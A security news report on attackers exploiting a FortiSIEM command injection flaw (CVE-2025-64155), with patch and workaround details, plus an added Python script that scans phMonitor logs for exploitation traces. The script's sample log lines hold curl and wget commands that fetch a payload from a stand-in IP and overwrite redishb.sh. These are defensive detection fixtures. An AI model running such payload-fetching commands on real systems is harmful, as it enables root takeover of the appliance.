**HACKERS NOW EXPLOITING CRITICAL FORTINET FORTISIEM FLAW IN ATTACKS**
A critical Fortinet FortiSIEM vulnerability, with publicly available proof-of-concept exploit code, is now being abused in attacks. The flaw, identified by security researcher Zach Hanley at penetration testing company Horizon3.ai, allows attackers to execute unauthorized code or commands via crafted TCP requests.
Fortinet described the bug on Tuesday, when it released security updates to patch it, as an "improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] [that] may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests." Chained with a second issue, it enables arbitrary file writes with admin permissions and escalation to root.
Horizon3.ai has published a technical write-up explaining that the root cause of the issue is the exposure of dozens of command handlers on the phMonitor service, which can be invoked remotely without authentication. The researchers also released proof-of-concept exploit code that allows gaining code execution as root by abusing an argument injection to overwrite the /opt/charting/redishb.sh file.
The flaw affects FortiSIEM versions 6.7 to 7.5 and is fixed in FortiSIEM 7.4.1, 7.3.5, 7.2.7, and 7.1.9 and later releases of their respective branches. Customers running FortiSIEM 7.0.0 through 7.0.4 or 6.7.0 through 6.7.10 are advised to migrate to a fixed release.
On Tuesday, Fortinet also shared a temporary workaround for admins who can't immediately apply security updates, requiring them to limit access to the phMonitor port (7900). However, threat intelligence firm Defused reported just two days later that threat actors are now actively exploiting the CVE-2025-64155 flaw in the wild.
"Fortinet FortiSIEM vulnerability CVE-2025-64155 is experiencing active, targeted exploitation in our honeypots," Defused warned. Horizon3.ai also provides indicators of compromise to help defenders identify already compromised systems.
As the researchers explained, admins can find evidence of malicious abuse by checking the phMonitor message logs at /opt/phoenix/log/phoenix.logs for payload URLs on lines that contain PHL_ERROR entries. Fortinet has yet to update its security advisory and flag the vulnerability as exploited in attacks.
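The log check above, as an added triage script (not Horizon3.ai's or Fortinet's tooling). The phoenix.logs path is the one named in the article; the sample log lines and their `[PHL_ERROR]:` layout are constructed for illustration, so the scan relies only on the two things the write-up names: the PHL_ERROR marker and a URL embedded in the same line. It also pulls the remote hosts out of the matched URLs so they can be fed straight into a block list or a wider hunt.

```python
"""Triage helper for the FortiSIEM phMonitor log check.

Added example, not code from the original page or the projects it cites.
Flags PHL_ERROR lines in /opt/phoenix/log/phoenix.logs that carry a URL,
which is the exploitation artifact Horizon3.ai's write-up describes.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

PHOENIX_LOG = "/opt/phoenix/log/phoenix.logs"  # path named in the article
MARKER = "PHL_ERROR"
# Stop at whitespace and common quoting/delimiter characters so a URL wrapped
# in quotes inside a logged shell command is captured cleanly.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    urls: list = field(default_factory=list)
    raw: str = ""


def scan_lines(lines):
    """Return PHL_ERROR lines that embed at least one URL."""
    hits = []
    for n, line in enumerate(lines, 1):
        if MARKER not in line:
            continue
        urls = URL_RE.findall(line)
        if urls:
            hits.append(Hit(n, urls, line.rstrip("\n")))
    return hits


def scan_file(path=PHOENIX_LOG):
    """Stream the real log; errors='replace' keeps a stray byte from aborting triage."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_lines(fh)


def unique_urls(hits):
    seen = []
    for h in hits:
        for u in h.urls:
            if u not in seen:
                seen.append(u)
    return seen


def remote_hosts(hits):
    """Distinct hosts the payload URLs point at, for blocking or pivoting."""
    hosts = []
    for u in unique_urls(hits):
        host = urlsplit(u).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


# Constructed sample lines (the layout is assumed, not the real format).
# 203.0.113.0/24 is the TEST-NET-3 documentation range, not a real attacker.
SAMPLE_LOG = [
    "2026-02-10 09:12:01 [PHL_INFO]: phMonitor started, listening on 7900",
    "2026-02-10 09:15:44 [PHL_ERROR]: failed to run command 'curl http://203.0.113.7/x.sh'",
    "2026-02-10 09:15:45 [PHL_ERROR]: handler rejected argument",
    "2026-02-10 09:16:02 [PHL_INFO]: see https://docs.fortinet.com for details",
    "2026-02-10 09:16:30 [PHL_ERROR]: exec 'wget https://203.0.113.7:8080/redishb.sh -O /opt/charting/redishb.sh'",
]

if __name__ == "__main__":
    # Swap SAMPLE_LOG for scan_file() on an appliance.
    found = scan_lines(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: {h.urls}")
    print("hosts:", remote_hosts(found))
```

Line 4 of the sample is deliberately an informational line with a URL and line 3 a PHL_ERROR line without one; neither should be reported, which is the point of keying on both conditions rather than grepping for either alone. A hit is a lead, not proof: confirm it against the modification time and contents of /opt/charting/redishb.sh and any process tree it spawned.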
**BREATHTAKINGLY SHORT TIMEFRAMES**
In November, Fortinet warned that attackers were exploiting a FortiWeb zero-day (CVE-2025-58034), days after confirming that it had silently patched another FortiWeb zero-day (CVE-2025-64446) that was also targeted in widespread attacks. In February 2024, it also revealed that the Chinese Volt Typhoon hacking group exploited two FortiOS vulnerabilities (tracked as CVE-2023-27997 and CVE-2022-42475) to deploy the Coathanger remote access trojan on a Dutch Ministry of Defence military network.
**LINKS AND RESOURCES**
* [Horizon3.ai Technical Write-up](link)
* [Defused Threat Intelligence Report](link)
* [Fortinet Security Advisory](link)